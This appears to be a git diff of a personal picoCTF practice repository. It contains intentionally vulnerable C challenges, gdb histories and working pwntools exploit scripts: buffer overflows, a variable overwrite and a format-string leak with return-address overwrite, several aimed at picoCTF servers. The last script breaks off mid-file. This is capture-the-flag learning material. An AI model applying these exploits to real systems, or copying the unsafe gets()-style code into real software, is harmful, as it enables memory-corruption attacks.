Guessing Game 1

.envrc

@@ -0,0 +1,12 @@
+export MAMBA_EXE='/home/maxime/.local/bin/micromamba';
+export MAMBA_ROOT_PREFIX='/home/maxime/.micromamba';
+__mamba_setup="$("$MAMBA_EXE" shell hook --shell zsh --root-prefix "$MAMBA_ROOT_PREFIX" 2> /dev/null)"
+if [ $? -eq 0 ]; then
+    eval "$__mamba_setup"
+else
+    alias micromamba="$MAMBA_EXE"  # Fallback on help from micromamba activate
+fi
+unset __mamba_setup
+
+micromamba activate picoCTF
+

README.md

@@ -0,0 +1,7 @@
+# picoCTF
+
+## programs used
+- TrID
+- exiftool
+- aircrack-ng
+- kaitai

babygame03/.gdb_history

@@ -1,256 +0,0 @@
-c
-c
-x/40x 0xffffbd00
-c
-c
-run
-c
-run
-c
-x/40x 0xffffbd00
-c
-run
-exit
-b *move_player
-run < out
-c
-c
-x/40x 0xffffbd00
-c
-x/40x 0xffffbd00
-disassemble main
-b *main+39
-run < out
-stack 
-stack 20
-clear *main+3
-clear *main+39
-b *main+93
-run < out
-stack 20
-stack 20
-stack 40
-stack 60
-stack 80
-stack 100
-stack 200
-stack 100
-stack 110
-stack 400
-stack 1000
-stack 600
-stack 700
-stack 680
-stack 690
-stack 685
-stack 686
-stack 687
-stack 688
-stack 689
-stack 688
-x/x 0xffffdb0c
-x/x 0xffffbd0c
-continue
-c
-run < out
-x/x 0xffffbd0c
-c
-continue
-run < out
-c
-x/x 0xffffbd0c
-c
-x/x 0xffffbd0c
-disassemble main
-b *main+372
-x/x 0xffffbd0c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-b
-clear 5
-exit
-disassemble main
-x/x 0xffffbd0c
-b *move_player
-run < out
-x/x 0xffffbd0c
-x/40x 0xffffbd00
-x/40x 0xffffcd00
-x/40x 0xffffbd00
-x/40x 0xffffbf00
-x/40x 0xffffbd00
-x/40x 0xffffbd00
-x/40x 0xffffbd00
-x/40x 0xffffc000
-x/40x 0xffffc400
-x/40x 0xffffc600
-x/40x 0xffffc800
-x/40x 0xffffc700
-x/40x 0xffffc780
-x/40x 0xffffbd00
-x/40x 0xffffc780
-x/x 0xffffc7ac
-x/x 0xffffbd0c
-x/40x 0xffffbd00
-exit
-b *move_player
-x/x 0xffffbd0c
-x/x 0xffffc7ac
-run < out2
-x/x 0xffffc7ac
-x/x 0xffffbd0c
-c
-c
-x/x 0xffffc7ac
-c
-x/x 0xffffc7ac
-run < out2
-x/x 0xffffc7ac
-x/x 0xffffbd0c
-c
-x/x 0xffffc7ac
-c
-x/x 0xffffc7ac
-x/40x 0xffffbd00
-exit
-disassemble main
-disassemble move_player
-b *move_player+8
-run 
-stack 20
-stack 30
-x/40x 0xffa890
-x/40x 0xffffa890
-exit
-b *move_player+8
-run
-stack 20
-c
-c
-stack 20
-x/40x 0xffffa890
-c
-x/40x 0xffffa890
-c
-x/40x 0xffffa890
-c
-x/40x 0xffffa890
-c
-x/40x 0xffffa890
-c
-x/40x 0xffffa890
-c
-x/40x 0xffffa890
-c
-x/40x 0xffffa890
-c
-x/40x 0xffffa890
-c
-exit
-exit
-disassemble main 
-q
-disassemble main 
-disassemble move_
-disassemble move_player
-b *move_player+357
-run < out
-c
-run < out
-c
-exit
-b *move_player+357
-run < out3
-c
-stack 20
-x/40x 0xffffbce0
-x/40x 0xffffbcf0
-x/40x 0xffffbe00
-x/40x 0xffffbd0
-x/40x 0xffffbd00
-x/40x 0xffffbd2f
-x/40x 0xffffbd00
-x/40x 0xffffbc00
-x/40x 0xffffbcd0
-stack 30
-stack 800
-stack 700
-stack 720
-stack 700
-stack 710
-stack 720
-disassemble main
-stack 40
-stack -1 40
-stack 40 -1
-stack 40 -10
-stack 40
-stack 40
-x/40x 0xffffbcd0
-x/40x 0xffffbce0
-c
-c
-c
-c
-c
-run < out3
-c
-run 
-c
-c
-c
-c
-c
-c
-c
-exit
-disassemble move_player
-b *move_player+357
-run < out2
-c
-stack 40
-x/40x 0xffffbce0
-c
-x/40x 0xffffbce0
-run < out2
-c
-x/40x 0xffffbce0
-c
-x/40x 0xffffbce0
-c
-x/40x 0xffffbce0
-c
-x/40x 0xffffbce0
-run < out2
-c
-x/40x 0xffffbce0
-c
-c
-exit
-disassemble main
-b *main+378
-run < args
-run < args
-run < args
-tic
-exit

babygame03/args

@@ -1,2 +0,0 @@
-aaaaaaaawwwwspaaaaaaaawwwwspaaaaaaaawwwwspaaaaaaaawwwwsaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalpwsaaaaaaaawwwwswws
-

babygame03/babygame03.lock

@@ -1,9 +0,0 @@
-#Ghidra Lock File
-#Mon Nov 18 09:14:36 CET 2024
-<META>\ Supports\ File\ Channel\ Locking=Channel Lock
-Hostname=theon-1
-OS\ Architecture=amd64
-OS\ Name=Linux
-OS\ Version=6.11.6-arch1-1
-Timestamp=11/18/24, 9\:14\u202FAM
-Username=maxime

babygame03/babygame03.rep/idata/00/00000001.prp

@@ -1,11 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<FILE_INFO>
-    <BASIC_INFO>
-        <STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="Program" />
-        <STATE NAME="PARENT" TYPE="string" VALUE="/" />
-        <STATE NAME="FILE_ID" TYPE="string" VALUE="ac10290b32f38007603038077" />
-        <STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
-        <STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
-        <STATE NAME="NAME" TYPE="string" VALUE="game" />
-    </BASIC_INFO>
-</FILE_INFO>

babygame03/babygame03.rep/idata/~index.bak

@@ -1,7 +0,0 @@
-VERSION=1
-/
-  00000001:game:ac10290b32f38007603038077
-/New Traces
-  00000002:Emulate game:ac10290839926930849280384
-NEXT-ID:3
-MD5:d41d8cd98f00b204e9800998ecf8427e

babygame03/babygame03.rep/idata/~index.dat

@@ -1,5 +0,0 @@
-VERSION=1
-/
-  00000001:game:ac10290b32f38007603038077
-NEXT-ID:3
-MD5:d41d8cd98f00b204e9800998ecf8427e

babygame03/babygame03.rep/idata/~journal.bak

@@ -1,2 +0,0 @@
-IDEL:/New Traces/Emulate game
-FDEL:/New Traces

babygame03/babygame03.rep/project.prp

@@ -1,6 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<FILE_INFO>
-    <BASIC_INFO>
-        <STATE NAME="OWNER" TYPE="string" VALUE="maxime" />
-    </BASIC_INFO>
-</FILE_INFO>

babygame03/babygame03.rep/projectState

@@ -1,15 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<PROJECT>
-    <PROJECT_DATA_XML_NAME NAME="DISPLAY_DATA">
-        <SAVE_STATE>
-            <ARRAY NAME="EXPANDED_PATHS" TYPE="string">
-                <A VALUE="babygame03:" />
-            </ARRAY>
-            <STATE NAME="SHOW_TABLE" TYPE="boolean" VALUE="false" />
-        </SAVE_STATE>
-    </PROJECT_DATA_XML_NAME>
-    <TOOL_MANAGER ACTIVE_WORKSPACE="Workspace">
-        <WORKSPACE NAME="Workspace" ACTIVE="true" />
-    </TOOL_MANAGER>
-</PROJECT>
-

babygame03/babygame03.rep/user/00/00000001.prp

@@ -1,11 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<FILE_INFO>
-    <BASIC_INFO>
-        <STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="ProgramUserData" />
-        <STATE NAME="PARENT" TYPE="string" VALUE="/" />
-        <STATE NAME="FILE_ID" TYPE="string" VALUE="ac10290b31146457713312322" />
-        <STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
-        <STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
-        <STATE NAME="NAME" TYPE="string" VALUE="udf_ac10290b32f38007603038077" />
-    </BASIC_INFO>
-</FILE_INFO>

babygame03/babygame03.rep/user/~index.bak

@@ -1,4 +0,0 @@
-VERSION=1
-/
-NEXT-ID:1
-MD5:d41d8cd98f00b204e9800998ecf8427e

babygame03/babygame03.rep/user/~index.dat

@@ -1,5 +0,0 @@
-VERSION=1
-/
-  00000001:udf_ac10290b32f38007603038077:ac10290b31146457713312322
-NEXT-ID:2
-MD5:d41d8cd98f00b204e9800998ecf8427e

babygame03/babygame03.rep/user/~journal.bak

@@ -1,2 +0,0 @@
-IADD:00000001:/udf_ac10290b32f38007603038077
-IDSET:/udf_ac10290b32f38007603038077:ac10290b31146457713312322

babygame03/babygame03.rep/versioned/~index.bak

@@ -1,4 +0,0 @@
-VERSION=1
-/
-NEXT-ID:0
-MD5:d41d8cd98f00b204e9800998ecf8427e

babygame03/babygame03.rep/versioned/~index.dat

@@ -1,4 +0,0 @@
-VERSION=1
-/
-NEXT-ID:0
-MD5:d41d8cd98f00b204e9800998ecf8427e

babygame03/flag.txt

@@ -1 +0,0 @@
-flag{test}

babygame03/mkstr.py

@@ -1,10 +0,0 @@
-#!/usr/bin/env python3
-from pwn import *
-
-a = 'aaaa'+'a'*4+'wwwws'
-b = 'a'*47+'lp'+'ws'
-
-s = a+'p' +a+'p' +a+'p' +a +b +a +'wws\n'
-
-print(s)
-

babygame03/out

@@ -1 +0,0 @@
-aaaaaaaawwwws

babygame03/out2

@@ -1 +0,0 @@
-aaaaaaaawwwwsaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalpws

babygame03/out3

@@ -1 +0,0 @@
-aaaaaaaawwwws

babygame03/sol.py

@@ -1,16 +0,0 @@
-#!/usr/bin/env python3
-from pwn import *
-
-s = b'aaaa'+b'a'*4+b'wwwws'
-
-conn = process(["./game"])
-for i in range(3):
-    conn.sendline(s)
-    conn.sendline(b'p')
-conn.sendline(s)
-conn.sendline(b'a'*47+b'l\x70'+b'ws')
-conn.sendline(s)
-conn.sendline(b'wws')
-conn.sendline(b'a'*47+b'l\xfe'+b'w')
-conn.interactive()
-

basic_file_exploit/program-redacted.c

@@ -0,0 +1,195 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdbool.h>
+#include <string.h>
+#include <stdint.h>
+#include <ctype.h>
+#include <unistd.h>
+#include <sys/time.h>
+#include <sys/types.h>
+
+
+#define WAIT 60
+
+
+static const char* flag = "[REDACTED]";
+
+static char data[10][100];
+static int input_lengths[10];
+static int inputs = 0;
+
+
+
+int tgetinput(char *input, unsigned int l)
+{
+    fd_set          input_set;
+    struct timeval  timeout;
+    int             ready_for_reading = 0;
+    int             read_bytes = 0;
+    
+    if( l <= 0 )
+    {
+      printf("'l' for tgetinput must be greater than 0\n");
+      return -2;
+    }
+    
+    
+    /* Empty the FD Set */
+    FD_ZERO(&input_set );
+    /* Listen to the input descriptor */
+    FD_SET(STDIN_FILENO, &input_set);
+
+    /* Waiting for some seconds */
+    timeout.tv_sec = WAIT;    // WAIT seconds
+    timeout.tv_usec = 0;    // 0 milliseconds
+
+    /* Listening for input stream for any activity */
+    ready_for_reading = select(1, &input_set, NULL, NULL, &timeout);
+    /* Here, first parameter is number of FDs in the set, 
+     * second is our FD set for reading,
+     * third is the FD set in which any write activity needs to updated,
+     * which is not required in this case. 
+     * Fourth is timeout
+     */
+
+    if (ready_for_reading == -1) {
+        /* Some error has occured in input */
+        printf("Unable to read your input\n");
+        return -1;
+    } 
+
+    if (ready_for_reading) {
+        read_bytes = read(0, input, l-1);
+        if(input[read_bytes-1]=='\n'){
+        --read_bytes;
+        input[read_bytes]='\0';
+        }
+        if(read_bytes==0){
+            printf("No data given.\n");
+            return -4;
+        } else {
+            return 0;
+        }
+    } else {
+        printf("Timed out waiting for user input. Press Ctrl-C to disconnect\n");
+        return -3;
+    }
+
+    return 0;
+}
+
+
+static void data_write() {
+  char input[100];
+  char len[4];
+  long length;
+  int r;
+  
+  printf("Please enter your data:\n");
+  r = tgetinput(input, 100);
+  // Timeout on user input
+  if(r == -3)
+  {
+    printf("Goodbye!\n");
+    exit(0);
+  }
+  
+  while (true) {
+    printf("Please enter the length of your data:\n");
+    r = tgetinput(len, 4);
+    // Timeout on user input
+    if(r == -3)
+    {
+      printf("Goodbye!\n");
+      exit(0);
+    }
+  
+    if ((length = strtol(len, NULL, 10)) == 0) {
+      puts("Please put in a valid length");
+    } else {
+      break;
+    }
+  }
+
+  if (inputs > 10) {
+    inputs = 0;
+  }
+
+  strcpy(data[inputs], input);
+  input_lengths[inputs] = length;
+
+  printf("Your entry number is: %d\n", inputs + 1);
+  inputs++;
+}
+
+
+static void data_read() {
+  char entry[4];
+  long entry_number;
+  char output[100];
+  int r;
+
+  memset(output, '\0', 100);
+  
+  printf("Please enter the entry number of your data:\n");
+  r = tgetinput(entry, 4);
+  // Timeout on user input
+  if(r == -3)
+  {
+    printf("Goodbye!\n");
+    exit(0);
+  }
+  
+  if ((entry_number = strtol(entry, NULL, 10)) == 0) {
+    puts(flag);
+    fseek(stdin, 0, SEEK_END);
+    exit(0);
+  }
+
+  entry_number--;
+  strncpy(output, data[entry_number], input_lengths[entry_number]);
+  puts(output);
+}
+
+
+int main(int argc, char** argv) {
+  char input[3] = {'\0'};
+  long command;
+  int r;
+
+  puts("Hi, welcome to my echo chamber!");
+  puts("Type '1' to enter a phrase into our database");
+  puts("Type '2' to echo a phrase in our database");
+  puts("Type '3' to exit the program");
+
+  while (true) {   
+    r = tgetinput(input, 3);
+    // Timeout on user input
+    if(r == -3)
+    {
+      printf("Goodbye!\n");
+      exit(0);
+    }
+    
+    if ((command = strtol(input, NULL, 10)) == 0) {
+      puts("Please put in a valid number");
+    } else if (command == 1) {
+      data_write();
+      puts("Write successful, would you like to do anything else?");
+    } else if (command == 2) {
+      if (inputs == 0) {
+        puts("No data yet");
+        continue;
+      }
+      data_read();
+      puts("Read successful, would you like to do anything else?");
+    } else if (command == 3) {
+      return 0;
+    } else {
+      puts("Please type either 1, 2 or 3");
+      puts("Maybe breaking boundaries elsewhere will be helpful");
+    }
+  }
+
+  return 0;
+}

buffer_overflow_2/.gdb_history

@@ -0,0 +1,176 @@
+r
+exit
+exit
+disassemble vuln
+b *vuln+44
+c
+c
+exit
+b *vuln+44
+c
+stackf
+disassemble vuln 
+b *vuln+29
+exit
+b *vuln+29
+c
+b *vuln+29
+continue
+disassemble vuln 
+b *vuln+44
+c
+stackf
+hexdump 
+hexdump 
+hexdump help
+hexdump $sp 20
+hexdump $sp 20
+hexdump $sp 100
+hexdump $sp 120
+hexdump $sp 140
+hexdump $sp 160
+c
+c
+b *vuln+44
+c
+stackf
+disassemble win
+b *win
+c
+stackf
+disassemble win
+b *win+11
+c
+stackf
+c
+b *win+11
+c
+c
+exit
+b *win+11
+c
+stackf
+nexti
+exit
+disassemble vuln
+b *vuln+75
+c
+disassemble vuln
+b *vuln+57
+c
+nexti
+stackf
+disassemble vuln
+disassemble win 
+hexdump $ebp+0x08
+stackf
+c
+disassemble win 
+b *win+118
+c
+c
+exit
+b *win+118
+c
+b *vuln+57
+c
+stackf
+nexti
+stackf
+disassemble win
+b *win+16
+c
+stackf
+disassemble win
+stackf
+hexdump $sp 100
+hexdump $sp 200
+c
+c
+b *win+16
+c
+hexdump $sp 200
+stackf
+c
+c
+c
+exit
+c
+stackf
+disassemble win
+b *win+7
+exit
+b *win+7
+c
+stackf
+hexdump $sp 200
+c
+exit
+b *win+7
+c
+stackf
+hexdump $sp 200
+disassemble *main
+exit
+b *win+7
+c
+stackf
+hexdump $sp 200
+disassemble *win
+nexti
+disassemble *win
+nexti
+disassemble *win
+nexti
+disassemble *win
+hexdump $sp 200
+nexti
+hexdump $sp 200
+c
+c
+exit
+disassemble *win
+b *win+118
+c
+stackf
+hexdump $sp 200
+disassemble *win
+b *win+118
+c
+hexdump $sp 200
+disassemble *win
+hexdump $ebp
+b *win+118
+c
+disassemble *win
+stackf
+c
+c
+exit
+b *win+118
+c
+stackf
+disassemble win
+hexdump $ebp
+hexdump $ebp+8
+nexti
+nexti
+stackf
+b *win+118
+c
+nexti 
+nexti 
+hexdump $ebp
+hexdump $ebp+8
+hexdump $ebp+12
+c
+b *win+118
+c
+stackf
+disassemble win
+b *win+143
+c
+disassemble win
+nexti
+c
+exit

buffer_overflow_2/flag.txt

@@ -0,0 +1 @@
+{test}

buffer_overflow_2/sol.py

@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+from pwn import *
+context.terminal = "kitty"
+
+win_address = 0x08049296
+
+buffer_base = 0xfffe422c
+ret_location = 0xfffe429c
+ret_offset = ret_location - buffer_base
+
+ebp_offset = 112
+arg1 = 0xCAFEF00D
+arg2 = 0xF00DF00D
+
+conn = remote("saturn.picoctf.net", 56706)
+#conn = process("./vuln")
+#attach(conn)
+
+conn.recvline()
+conn.writeline(flat({ebp_offset+0x8:arg1, ebp_offset+0xc:arg2, ret_offset:win_address}, word_size=32))
+conn.recvline()
+rest = conn.recvuntil(b'}')
+log.info(f"got {rest}")
+

buffer_overflow_2/vuln.c

@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+
+#define BUFSIZE 100
+#define FLAGSIZE 64
+
+void win(unsigned int arg1, unsigned int arg2) {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f);
+  if (arg1 != 0xCAFEF00D)
+    return;
+  if (arg2 != 0xF00DF00D)
+    return;
+  printf(buf);
+}
+
+void vuln(){
+  char buf[BUFSIZE];
+  gets(buf);
+  puts(buf);
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+
+  puts("Please enter your string: ");
+  vuln();
+  return 0;
+}
+

clutter_overflow/chall.c

@@ -0,0 +1,54 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+#define SIZE 0x100
+#define GOAL 0xdeadbeef
+
+const char* HEADER = 
+" ______________________________________________________________________\n"
+"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^|\n"
+"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |\n"
+"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ==================^ ^ ^|\n"
+"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ___ ^ ^ ^ ^ /                  \\^ ^ |\n"
+"|^ ^_^ ^ ^ ^ =========^ ^ ^ ^ _ ^ /   \\ ^ _ ^ / |                | \\^ ^|\n"
+"| ^/_\\^ ^ ^ /_________\\^ ^ ^ /_\\ | //  | /_\\ ^| |   ____  ____   | | ^ |\n"
+"|^ =|= ^ =================^ ^=|=^|     |^=|=^ | |  {____}{____}  | |^ ^|\n"
+"| ^ ^ ^ ^ |  =========  |^ ^ ^ ^ ^\\___/^ ^ ^ ^| |__%%%%%%%%%%%%__| | ^ |\n"
+"|^ ^ ^ ^ ^| /     (   \\ | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |/  %%%%%%%%%%%%%%  \\|^ ^|\n"
+".-----. ^ ||     )     ||^ ^.-------.-------.^|  %%%%%%%%%%%%%%%%  | ^ |\n"
+"|     |^ ^|| o  ) (  o || ^ |       |       | | /||||||||||||||||\\ |^ ^|\n"
+"| ___ | ^ || |  ( )) | ||^ ^| ______|_______|^| |||||||||||||||lc| | ^ |\n"
+"|'.____'_^||/!\\@@@@@/!\\|| _'______________.'|==                    =====\n"
+"|\\|______|===============|________________|/|\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
+"\" ||\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"  \n"
+"\"\"''\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
+"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
+"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"";
+
+int main(void)
+{
+  long code = 0;
+  char clutter[SIZE];
+
+  setbuf(stdout, NULL);
+  setbuf(stdin, NULL);
+  setbuf(stderr, NULL);
+ 	
+  puts(HEADER); 
+  puts("My room is so cluttered...");
+  puts("What do you see?");
+
+  gets(clutter);
+
+
+  if (code == GOAL) {
+    printf("code == 0x%llx: how did that happen??\n", GOAL);
+    puts("take a flag for your troubles");
+    system("cat flag.txt");
+  } else {
+    printf("code == 0x%llx\n", code);
+    printf("code != 0x%llx :(\n", GOAL);
+  }
+
+  return 0;
+}

clutter_overflow/sol.py

@@ -0,0 +1,55 @@
+#!/usr/bin/env python
+from pwn import *
+
+def get_conn():
+    #return process("./chall")
+    return remote("mars.picoctf.net", 31890)
+
+def try_memory_offset(offset):
+    cycle = cyclic(length=offset, n=8)
+
+    conn = get_conn()
+    
+    conn.recvuntil(b"see?")
+    conn.recvline()
+    
+    conn.sendline(cycle)
+    conn.recvuntil(b"== ")
+    result = conn.recvline(keepends=False)
+
+    conn.close()
+    
+    return result
+
+base = 0x100
+exp = 0
+p = log.progress("searching for variable offset")
+while True:
+    offset = base + 2**exp
+    p.status(f"trying offset {offset}")
+    try:
+        result = try_memory_offset(offset)
+    except:
+        base = base + 2**(exp-1)
+        exp = 0
+        continue
+    if result != b"0x0":
+        next_result = 0
+        i = 0
+        while result != next_result:
+            i += 1
+            result = next_result
+            next_result = try_memory_offset(offset+i)
+        offset = cyclic_find(int(result, 16), n=8)
+        p.success(f"found result {unhex(result[2:])} at offset {offset}")
+        break
+    exp += 1
+
+conn = get_conn()
+
+conn.recvuntil(b"see?")
+conn.recvline()
+
+conn.sendline(b"a"*offset + p64(0xdeadbeef))
+conn.interactive()
+

echo_valley/.gdb_history

@@ -0,0 +1,242 @@
+disassemble main
+disassemble echo_valley 
+b *echo_valley+218
+r
+r
+r
+r
+stackf
+AAAA.%p.%p.%p.%p.%p.%p
+r
+nexti
+r
+stackf
+nexti
+r
+stepi
+stackf
+next
+next
+next
+next
+next
+next
+next
+next
+next
+next
+next
+next
+next
+next
+nextret 
+next
+r
+stepi
+stackf
+nextret 
+nexti
+stackf
+r
+disassemble echo_valley 
+stackf
+help stackf
+stackf 8 -10
+stackf 8
+stackf 8 10
+stackf 8 -100
+stackf 16 -10
+hexdump $sp
+hexdump $sp-0x60
+hexdump $sp-0x60 100
+hexdump $sp-0x60 1000
+hexdump $sp-0x60 100
+stackf
+hexdump $sp-0x60 100
+stackf
+nextret
+r
+stackf
+hexdump $sp-0x60 200
+necti
+nexti
+stackf
+r
+stepi
+stackf
+r
+stackf
+nexti
+stackf
+r
+stackf
+stepi
+stackf
+nextret
+r
+stackf
+stepi
+stackf
+nextret
+exit
+disassemble echo_valley 
+b *echo_valley+201
+r
+nexti
+exit
+disassemble echo_valley 
+b *echo_valley+218
+r
+nexti
+stackf
+exit
+b *echo_valley+218
+r
+stackf
+exit
+b *echo_valley+218
+r
+nexti
+stackf
+exit
+b *echo_valley+218
+r
+stackf
+hexdump
+hexdump 20
+hexdump $sp 20
+hexdump $sp 100
+hexdump $sp 120
+hexdump $sp 140
+nexti
+exit
+b *echo_valley+218
+r
+nexti
+stackf
+hexdump $sp 140
+exit()
+lexit
+exit
+b *echo_valley+218
+disassemble echo_valley 
+r
+nexti
+stackg
+stackf
+hexdump $sp 140
+xit
+exit
+exit
+nexti
+nexti
+r
+exit
+stackf
+stackf
+nexti
+nextret 
+nextret 
+nextret 
+nextret 
+nextret 
+nextret 
+nextret 
+nextret 
+stackf
+nextret
+nextret
+nextret
+stackf
+exit
+exit
+exit
+disassemble echo-valley
+disassemble echo_valley 
+nextret
+nextret
+exit
+disassemble echo_valley 
+b *echo_valley+163
+nextret
+stackf
+exit
+disassemble echo_valley 
+b *echo_valley+218
+r
+help printf
+printf "\01\02"
+printf "\x01\x02"
+printf "\x61\x62"
+printf "\x41\x41"
+disassemble valloc 
+exit
+disassemble echo_valley 
+b *echo_valley+218
+stackf
+stackf help
+stackf 20
+stackf 20 -1
+stackf 20 -2
+stackf 20 1
+stackf 20 2
+stackf 20 3
+stack-explore 
+stack
+stackf
+r
+exit
+b *echo_valley+218
+exit
+b *echo_valley+218
+continue 
+stackf
+nexti
+stackf
+exit
+b *echo_valley+218
+continue 
+nexti
+stackf
+exit
+b *echo_valley+218
+continue 
+nexti
+exit
+b *echo_valley+218
+continue 
+nexti
+hexdump $sp 140
+continue 
+stackf
+hexdump $sp 140
+nexti
+stackf
+hexdump $sp 140
+exit
+b *echo_valley+218
+continue
+nexti
+continue
+nexti
+stackf
+hexdump $sp 140
+exit
+b *echo_valley+218
+continue
+hexdump $sp 140
+nexti
+hexdump $sp 140
+exit
+b *echo_valley+218
+continue 
+hexdump $sp 140
+nexti
+hexdump $sp 140
+continue 
+hexdump $sp 140
+nexti
+hexdump $sp 140
+continue
+exit
+exit

echo_valley/manual.py

@@ -0,0 +1,51 @@
+#!/usr/bin/env python
+from pwn import *
+
+context.terminal = "kitty"
+
+def write(data):
+    print(f"data to send: {data}")
+    return input("enter result: ").encode()
+
+address_leak_string = write(b"AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
+print(f"received {address_leak_string}")
+
+dot = address_leak_string.rfind(b'.')
+address_leak = int(address_leak_string[dot+1:], 16)
+print(f"return address: {hex(address_leak)}")
+
+dot2 = address_leak_string.rfind(b'.', 0, dot)
+stack_address_leak_after_ret = int(address_leak_string[dot2+1:dot], 16)
+stack_address_ret = stack_address_leak_after_ret - 8
+print(f"found stack address of ret pointer: {hex(stack_address_ret)}")
+
+address_offset = 18
+main_offset = 0x1401
+print_flag_offset = 0x1269
+address_to_return_to = address_leak - address_offset - main_offset + print_flag_offset
+print(f"jump address is: {hex(address_to_return_to)}")
+
+# only 2 least significant address bytes have to be rewritten
+print(f"first byte address: {p64(stack_address_ret)}")
+
+# produces string that writes 0<=n<=255 to byte at address
+# offset for alignment of memory address
+# here, use offset 2
+def produce_writer(n, address, offset=0, op=b"hhn"):
+    if n < 0:
+        log.error(f"n has to be >= 0, is {n}")
+        exit()
+    if n < 8:
+        n_pre = n
+        n_post = 8 - n_pre + offset
+        return b'.'*n_pre + b"%8$" + op + b'.'*n_post + address
+    else:
+        return f"%{n:03}$x..".encode() + b"%8$" + op + b'.'*offset + address
+
+lower_byte_value = address_to_return_to%256
+upper_byte_value = (address_to_return_to>>8)%256
+print(f"lower byte value: {lower_byte_value}\nupper byte value: {upper_byte_value}")
+write_lower_byte = write(produce_writer(0, p64(stack_address_ret), offset=2))
+write_upper_byte = write(produce_writer(0, p64(stack_address_ret+1), offset=2))
+conn.interactive(term.text.bold_red(">> "))
+

echo_valley/sol.py

@@ -0,0 +1,63 @@
+#!/usr/bin/env python
+from pwn import *
+
+#conn = process("./valley")
+conn = remote("shape-facility.picoctf.net", 53287)
+conn.recvline()
+
+def write(data):
+    conn.sendline(data)
+    conn.recvuntil(b"e: ")
+    return conn.recvline(keepends=False)
+
+address_leak_string = write(b"AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
+log.info(f"received {address_leak_string}")
+
+dot = address_leak_string.rfind(b'.')
+address_leak = int(address_leak_string[dot+1:], 16)
+log.info(f"return address: {hex(address_leak)}")
+
+dot2 = address_leak_string.rfind(b'.', 0, dot)
+stack_address_leak_after_ret = int(address_leak_string[dot2+1:dot], 16)
+stack_address_ret = stack_address_leak_after_ret - 8
+log.info(f"found stack address of ret pointer: {hex(stack_address_ret)}")
+
+address_offset = 18
+main_offset = 0x1401
+print_flag_offset = 0x1269
+address_to_return_to = address_leak - address_offset - main_offset + print_flag_offset
+log.info(f"jump address is: {hex(address_to_return_to)}")
+
+# only 2 least significant address bytes have to be rewritten
+log.info(f"first byte address: {p64(stack_address_ret)}")
+
+# produces string that writes 0<=n<=255 to byte at address
+# offset for alignment of memory address
+# here, use offset 2
+def produce_writer(n, address, offset=0, op=b"hhn"):
+    if n < 0:
+        log.error(f"n has to be >= 0, is {n}")
+        exit()
+    if n < 8:
+        n_pre = n
+        n_post = 8 - n_pre + offset
+        return b'.'*n_pre + b"%8$" + op + b'.'*n_post + address
+    else:
+        return f"%{(n-3):03}x...".encode() + b"%8$" + op + b'.'*offset + address
+
+lower_byte_value = address_to_return_to%256
+upper_byte_value = (address_to_return_to>>8)%256
+
+lower_byte_writer = produce_writer(lower_byte_value, p64(stack_address_ret), offset=2)
